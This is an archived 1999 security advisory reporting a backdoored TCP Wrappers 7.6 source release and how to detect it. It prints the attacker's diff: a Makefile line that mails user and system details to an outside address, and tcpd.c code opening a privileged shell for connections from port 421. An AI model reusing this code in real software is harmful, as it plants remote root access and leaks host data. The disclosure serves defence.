backdoored tcp wrapper source code

From: Wietse Venema (wietseat_private)
Date: Thu Jan 21 1999 - 08:38:17 PST

  • Next message: Richard Kettlewell: "Re: NetBSD Security Advisory 1999-001: select(2)/accept(2) race" 

    TCP Wrappers is a widely-used security tool to protect UNIX systems
against intrusion. In has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
a backdoored version. Eventually this was bound to happen, and
that's why the source file is accompanied by a PGP signature.  But
that is no guarantee against people downloading and installing
backdoored software.

The backdoor gives access to a privileged shell when a client
connects from port 421.

The backdoored copy was downloaded 52 times between 07:16 MET and
16:29 MET. I have informed the sites that downloaded a copy.

Below are details on how to recognize the backdoored version.

        Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

    % ls -lcta
    -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
    ...
    dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .

Restored version:

    % ls -lt tcp_wrappers_7.6.tar.gz
    -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.
The signature of a compiled tcpd binary is:

    strings -a tcpd | grep csh

any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile        Mon Apr  7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
        @echo
        @echo "If none of these match your environment, edit the system"
        @echo "dependencies sections in the Makefile and do a 'make other'."
+       @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpdat_private'
        @echo

  #######################################################
***************
*** 649,655 ****
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options
  ############################
--- 650,656 ----
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! # KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options
  ############################
Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
  int     allow_severity = SEVERITY;    /* run-time adjustable */
  int     deny_severity = LOG_WARNING;  /* ditto */

+ char    IDENT[]="NC421\n";
+ char    SRUN[]="-csh";
+ char    SPATH[]="/bin/csh";
+ #define PORT 421
+
  main(argc, argv)
  int     argc;
  char  **argv;
  {
      struct request_info request;
+     struct sockaddr_in from;
      char    path[MAXPATHNAMELEN];
+     int     fromlen;
+
+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}

      /* Attempt to prevent the creation of world-writable files. */

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:29:36 PDT